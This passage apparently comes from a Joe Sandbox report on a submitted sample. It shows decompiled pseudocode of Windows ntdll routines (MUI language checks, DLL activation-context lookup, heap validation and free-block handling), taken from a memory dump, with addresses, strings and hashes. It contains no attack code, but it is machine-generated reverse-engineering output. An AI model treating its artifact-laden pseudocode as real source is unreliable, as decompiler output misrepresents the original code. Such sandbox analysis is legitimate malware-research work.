					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L009B4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E009DF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E009E1370(_v16, 0x974e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E009DBB40(_t262,  &_v68, _t244);
								if(L009A43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E009E1370(_t282, 0x974e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E009DBB40(_t262,  &_v68, _t201);
							if(L009A43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L009B4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E009DF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E009E1370(_t280, 0x974e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E009DBB40(_t267,  &_v68, _t245);
							if(L009A43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E009E1370(_t284, 0x974e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E009DBB40(_t267,  &_v68, _t224);
						if(L009A43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                                0x009a3d3c
                                                                                                                0x009a3d42
                                                                                                                0x009a3d44
                                                                                                                0x009a3d46
                                                                                                                0x009a3d49
                                                                                                                0x009a3d4c
                                                                                                                0x009a3d4f
                                                                                                                0x009a3d52
                                                                                                                0x009a3d55
                                                                                                                0x009a3d58
                                                                                                                0x009a3d5b
                                                                                                                0x009a3d5f
                                                                                                                0x009a3d61
                                                                                                                0x009a3d66
                                                                                                                0x009f8213
                                                                                                                0x009f8218
                                                                                                                0x009a4085
                                                                                                                0x009a4088
                                                                                                                0x009a408e
                                                                                                                0x009a4094
                                                                                                                0x009a409a
                                                                                                                0x009a40a0
                                                                                                                0x009a40a6
                                                                                                                0x009a40a9
                                                                                                                0x009a40af
                                                                                                                0x009a40b6
                                                                                                                0x009a40bd
                                                                                                                0x009a40bd
                                                                                                                0x009a3d83
                                                                                                                0x009f821f
                                                                                                                0x009f8229
                                                                                                                0x009f8238
                                                                                                                0x009f8238
                                                                                                                0x009f823d
                                                                                                                0x009f823d
                                                                                                                0x009a3da0
                                                                                                                0x009a3daf
                                                                                                                0x009a3db5
                                                                                                                0x009a3dba
                                                                                                                0x009a3dba
                                                                                                                0x009a3dd4
                                                                                                                0x009a3e94
                                                                                                                0x009a3eab
                                                                                                                0x009a3f6d
                                                                                                                0x009a3f84
                                                                                                                0x009a406b
                                                                                                                0x009a406b
                                                                                                                0x009a406e
                                                                                                                0x009a406e
                                                                                                                0x009a4070
                                                                                                                0x009a4074
                                                                                                                0x009f8351
                                                                                                                0x009f8351
                                                                                                                0x009a407a
                                                                                                                0x009a407f
                                                                                                                0x009f835d
                                                                                                                0x009f8370
                                                                                                                0x009f8377
                                                                                                                0x009f8379
                                                                                                                0x009f837c
                                                                                                                0x009f837c
                                                                                                                0x009f835d
                                                                                                                0x00000000
                                                                                                                0x009a407f
                                                                                                                0x009a3f8a
                                                                                                                0x009a3f8d
                                                                                                                0x009a3f90
                                                                                                                0x009a3f95
                                                                                                                0x009f830d
                                                                                                                0x009f830f
                                                                                                                0x009a3f9b
                                                                                                                0x009a3fac
                                                                                                                0x009a3fae
                                                                                                                0x009a3fb1
                                                                                                                0x009a3fb1
                                                                                                                0x009a3fb6
                                                                                                                0x009f8317
                                                                                                                0x009f831a
                                                                                                                0x00000000
                                                                                                                0x009a3fbc
                                                                                                                0x009a3fc1
                                                                                                                0x009a3fc9
                                                                                                                0x009a3fd7
                                                                                                                0x009a3fda
                                                                                                                0x009a3fdd
                                                                                                                0x009a4021
                                                                                                                0x009a4021
                                                                                                                0x009a4029
                                                                                                                0x009a4030
                                                                                                                0x009a4044
                                                                                                                0x009a4046
                                                                                                                0x009a4046
                                                                                                                0x009a4044
                                                                                                                0x009a4049
                                                                                                                0x009f8327
                                                                                                                0x009f8334
                                                                                                                0x009f8339
                                                                                                                0x009f833c
                                                                                                                0x009a404f
                                                                                                                0x009a404f
                                                                                                                0x009a404f
                                                                                                                0x009a4051
                                                                                                                0x009a4056
                                                                                                                0x009a4063
                                                                                                                0x009a4063
                                                                                                                0x009a4068
                                                                                                                0x00000000
                                                                                                                0x009a4068
                                                                                                                0x009a3fdf
                                                                                                                0x009a3fe2
                                                                                                                0x009a3fe4
                                                                                                                0x009a3fe7
                                                                                                                0x009a3fef
                                                                                                                0x009a4003
                                                                                                                0x009a4005
                                                                                                                0x009a4005
                                                                                                                0x009a400c
                                                                                                                0x009a4013
                                                                                                                0x009a4016
                                                                                                                0x009a4017
                                                                                                                0x009a401b
                                                                                                                0x009a401e
                                                                                                                0x00000000
                                                                                                                0x009a401e
                                                                                                                0x009a3fb6
                                                                                                                0x009a3eb1
                                                                                                                0x009a3eb4
                                                                                                                0x009a3eb7
                                                                                                                0x009a3ebc
                                                                                                                0x009f82a9
                                                                                                                0x009f82ab
                                                                                                                0x009a3ec2
                                                                                                                0x009a3ed3
                                                                                                                0x009a3ed5
                                                                                                                0x009a3ed8
                                                                                                                0x009a3ed8
                                                                                                                0x009a3edd
                                                                                                                0x009f82b3
                                                                                                                0x009f82b6
                                                                                                                0x00000000
                                                                                                                0x009a3ee3
                                                                                                                0x009a3ee8
                                                                                                                0x009a3eed
                                                                                                                0x009a3ef0
                                                                                                                0x009a3ef3
                                                                                                                0x009a3f02
                                                                                                                0x009a3f05
                                                                                                                0x009a3f08
                                                                                                                0x009f82c0
                                                                                                                0x009f82c3
                                                                                                                0x009f82c5
                                                                                                                0x009f82c8
                                                                                                                0x009f82d0
                                                                                                                0x009f82e4
                                                                                                                0x009f82e6
                                                                                                                0x009f82e6
                                                                                                                0x009f82ed
                                                                                                                0x009f82f4
                                                                                                                0x009f82f7
                                                                                                                0x009f82f8
                                                                                                                0x009f82fc
                                                                                                                0x009f82ff
                                                                                                                0x009f82ff
                                                                                                                0x009a3f0e
                                                                                                                0x009a3f11
                                                                                                                0x009a3f16
                                                                                                                0x009a3f1d
                                                                                                                0x009a3f31
                                                                                                                0x009f8307
                                                                                                                0x009f8307
                                                                                                                0x009a3f31
                                                                                                                0x009a3f39
                                                                                                                0x009a3f48
                                                                                                                0x009a3f4d
                                                                                                                0x009a3f50
                                                                                                                0x009a3f50
                                                                                                                0x009a3f53
                                                                                                                0x009a3f58
                                                                                                                0x009a3f65
                                                                                                                0x009a3f65
                                                                                                                0x009a3f6a
                                                                                                                0x00000000
                                                                                                                0x009a3f6a
                                                                                                                0x009a3edd
                                                                                                                0x009a3dda
                                                                                                                0x009a3ddd
                                                                                                                0x009a3de0
                                                                                                                0x009a3de5
                                                                                                                0x009f8245
                                                                                                                0x009a3deb
                                                                                                                0x009a3df7
                                                                                                                0x009a3dfc
                                                                                                                0x009a3dfe
                                                                                                                0x009a3e01
                                                                                                                0x009a3e01
                                                                                                                0x009a3e06
                                                                                                                0x009f824d
                                                                                                                0x009f824f
                                                                                                                0x009f8254
                                                                                                                0x00000000
                                                                                                                0x009a3e0c
                                                                                                                0x009a3e11
                                                                                                                0x009a3e16
                                                                                                                0x009a3e19
                                                                                                                0x009a3e29
                                                                                                                0x009a3e2c
                                                                                                                0x009a3e2f
                                                                                                                0x009f825c
                                                                                                                0x009f825f
                                                                                                                0x009f8261
                                                                                                                0x009f8264
                                                                                                                0x009f826c
                                                                                                                0x009f8280
                                                                                                                0x009f8282
                                                                                                                0x009f8282
                                                                                                                0x009f8289
                                                                                                                0x009f8290
                                                                                                                0x009f8293
                                                                                                                0x009f8294
                                                                                                                0x009f8298
                                                                                                                0x009f829b
                                                                                                                0x009f829b
                                                                                                                0x009a3e35
                                                                                                                0x009a3e38
                                                                                                                0x009a3e3d
                                                                                                                0x009a3e44
                                                                                                                0x009a3e58
                                                                                                                0x009f82a3
                                                                                                                0x009f82a3
                                                                                                                0x009a3e58
                                                                                                                0x009a3e60
                                                                                                                0x009a3e6f
                                                                                                                0x009a3e74
                                                                                                                0x009a3e77
                                                                                                                0x009a3e77
                                                                                                                0x009a3e7a
                                                                                                                0x009a3e7f
                                                                                                                0x009a3e8c
                                                                                                                0x009a3e8c
                                                                                                                0x009a3e91
                                                                                                                0x00000000
                                                                                                                0x009a3e91

                                                                                                                Strings
                                                                                                                • Kernel-MUI-Language-Allowed, xrefs: 009A3DC0
                                                                                                                • WindowsExcludedProcs, xrefs: 009A3D6F
                                                                                                                • Kernel-MUI-Number-Allowed, xrefs: 009A3D8C
                                                                                                                • Kernel-MUI-Language-SKU, xrefs: 009A3F70
                                                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 009A3E97
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                • API String ID: 0-258546922
                                                                                                                • Opcode ID: ab38b6d9100c271db66e4f0c18d920dbb0f7555a9a4684b5799221e95a79a207
                                                                                                                • Instruction ID: db29e5944f81a0771fec69359bdd9d7a5ccfdcd6d34a98b74c36ecfab331b86e
                                                                                                                • Opcode Fuzzy Hash: ab38b6d9100c271db66e4f0c18d920dbb0f7555a9a4684b5799221e95a79a207
                                                                                                                • Instruction Fuzzy Hash: D7F14A72D00618EFCB11DF98C981AEEBBBDFF89750F15456AE505A7211EB749E00CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009C8E00, Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 44%
                                                                                                                			E009C8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0xa8d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0xa88464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0xa85780 & 0x00000003) != 0) {
							E00A15510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0xa85780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E009DB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0xa87984; // 0x532b20
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0xa88464; // 0x74b10110
					 *0xa8b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E009C9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0xa85780 & 0x00000005) != 0) {
						_push(_t49);
						E00A15510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                                                0x009c8e0f
                                                                                                                0x009c8e16
                                                                                                                0x009c8e19
                                                                                                                0x009c8e1b
                                                                                                                0x009c8e21
                                                                                                                0x009c8e7f
                                                                                                                0x009c8e85
                                                                                                                0x00a09354
                                                                                                                0x00a0936c
                                                                                                                0x00a09371
                                                                                                                0x00a0937b
                                                                                                                0x00a09381
                                                                                                                0x00a09381
                                                                                                                0x00a0937b
                                                                                                                0x009c8e9d
                                                                                                                0x009c8e9d
                                                                                                                0x009c8e29
                                                                                                                0x009c8e2c
                                                                                                                0x009c8e38
                                                                                                                0x009c8e3e
                                                                                                                0x009c8e43
                                                                                                                0x009c8eb5
                                                                                                                0x009c8eb9
                                                                                                                0x00a092aa
                                                                                                                0x00a092af
                                                                                                                0x00a092e8
                                                                                                                0x00a092e8
                                                                                                                0x00a092af
                                                                                                                0x009c8eb9
                                                                                                                0x009c8e45
                                                                                                                0x009c8e53
                                                                                                                0x009c8e5b
                                                                                                                0x009c8e5f
                                                                                                                0x009c8e78
                                                                                                                0x009c8e78
                                                                                                                0x009c8e7d
                                                                                                                0x009c8ec3
                                                                                                                0x009c8ecd
                                                                                                                0x009c8ed2
                                                                                                                0x009c8ed2
                                                                                                                0x009c8ec5
                                                                                                                0x009c8ec5
                                                                                                                0x00000000
                                                                                                                0x009c8e7d
                                                                                                                0x009c8e67
                                                                                                                0x009c8ea4
                                                                                                                0x00a0931a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a09320
                                                                                                                0x009c8ea4
                                                                                                                0x009c8e70
                                                                                                                0x00a09325
                                                                                                                0x00a09340
                                                                                                                0x00a09345
                                                                                                                0x00a09345
                                                                                                                0x009c8e76
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 00A09357
                                                                                                                • +S, xrefs: 009C8E2C
                                                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00A0932A
                                                                                                                • LdrpFindDllActivationContext, xrefs: 00A09331, 00A0935D
                                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 00A0933B, 00A09367
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: +S$LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                • API String ID: 0-1080347802
                                                                                                                • Opcode ID: 6e99498a0833f0e3dc8b0012757c95bb49df38030ffab7c2deb4c5eaa79790b3
                                                                                                                • Instruction ID: 439c498b3600dca52fb0d2a29646829bd021c4f19c4d4a89a5444b620f41df64
                                                                                                                • Opcode Fuzzy Hash: 6e99498a0833f0e3dc8b0012757c95bb49df38030ffab7c2deb4c5eaa79790b3
                                                                                                                • Instruction Fuzzy Hash: DA410B32E003199FDB34BB58985DF777279AB54358F05856DE808571A1EF706C80C793
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009940E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 29%
                                                                                                                			E009940E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0099B150();
					} else {
						E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0099B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0099B150(", passed to %s", _t29);
					}
					_push("\n");
					E0099B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0xa86378 = 1;
						asm("int3");
						 *0xa86378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                                                                                0x009940e6
                                                                                                                0x009940e8
                                                                                                                0x009940f1
                                                                                                                0x009f042d
                                                                                                                0x009f044c
                                                                                                                0x009f0451
                                                                                                                0x009f042f
                                                                                                                0x009f0444
                                                                                                                0x009f0449
                                                                                                                0x009f045d
                                                                                                                0x009f0466
                                                                                                                0x009f046e
                                                                                                                0x009f0474
                                                                                                                0x009f0475
                                                                                                                0x009f047a
                                                                                                                0x009f048a
                                                                                                                0x009f048c
                                                                                                                0x009f0493
                                                                                                                0x009f0494
                                                                                                                0x009f0494
                                                                                                                0x00000000
                                                                                                                0x009f049b
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                                                                • API String ID: 0-188067316
                                                                                                                • Opcode ID: 8bc12a6b9604190611c13b4814d73cc7b4d9751927f9569a1248b066e34cddc7
                                                                                                                • Instruction ID: e78b4b1a553ac1742e622bcf13e302681926eed17ffa3fa4d90389fb587e2069
                                                                                                                • Opcode Fuzzy Hash: 8bc12a6b9604190611c13b4814d73cc7b4d9751927f9569a1248b066e34cddc7
                                                                                                                • Instruction Fuzzy Hash: DC012D331086449ED629976CA51EFA577A8DBC2F30F248069F1084B6A2DBE89840C610
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009BA830, Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E009BA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0xa88748 - 1;
					if( *0xa88748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E0099B150();
									_t260 = _t257 + 4;
								} else {
									E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E0099B150();
								_t257 = _t260 + 4;
								__eflags =  *0xa87bc8;
								if(__eflags == 0) {
									E00A52073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E00A5A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E009ED5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E009BAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E00A5A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E00A5A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
